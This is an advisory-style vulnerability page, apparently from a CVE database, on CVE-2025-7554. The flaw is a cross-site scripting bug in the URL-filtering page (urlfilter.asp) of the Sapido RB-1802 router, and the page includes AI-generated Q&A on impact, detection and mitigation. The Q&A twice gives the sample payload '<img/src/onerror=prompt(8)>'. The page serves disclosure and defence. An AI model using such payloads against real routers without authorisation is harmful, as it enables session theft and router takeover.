CVE-2025-7554
BaseFortify
Publication date: 2025-07-14
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| sapido | rb-1802 | 1.0.32 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is an unrestricted Cross-Site Scripting (XSS) issue in the Sapido RB-1802 router (version 1.0.32), specifically in the urlfilter.asp file on the URL filtering page. It occurs because the URL parameter is not properly validated or sanitized, allowing attackers to inject and execute malicious scripts remotely. For example, an attacker can use a payload like `<img/src/onerror=prompt(8)>` to run arbitrary JavaScript code. [1]
How can this vulnerability impact me? :
Exploiting this vulnerability can allow attackers to perform injection attacks such as executing arbitrary JavaScript code in the context of the affected device's web interface. This can lead to theft of session cookies, potentially enabling attackers to hijack user sessions, impersonate users, or perform unauthorized actions on the router's management interface. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the URL filtering page (urlfilter.asp) of the Sapido RB-1802 router for cross-site scripting (XSS) issues. You can try injecting typical XSS payloads such as `<img/src/onerror=prompt(8)>` into the URL parameter and observe if the script executes. For example, using curl or a browser to send requests with the payload in the URL parameter and checking for script execution or reflected input can help detect the vulnerability. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include disabling or restricting access to the URL filtering page (urlfilter.asp) on the Sapido RB-1802 router, especially from untrusted networks. Additionally, avoid using the affected version 1.0.32 until a patch or update is available. Implement network-level protections such as web application firewalls (WAF) to block malicious input patterns targeting the URL parameter. Educate users to avoid clicking suspicious links that may exploit this XSS vulnerability. [1]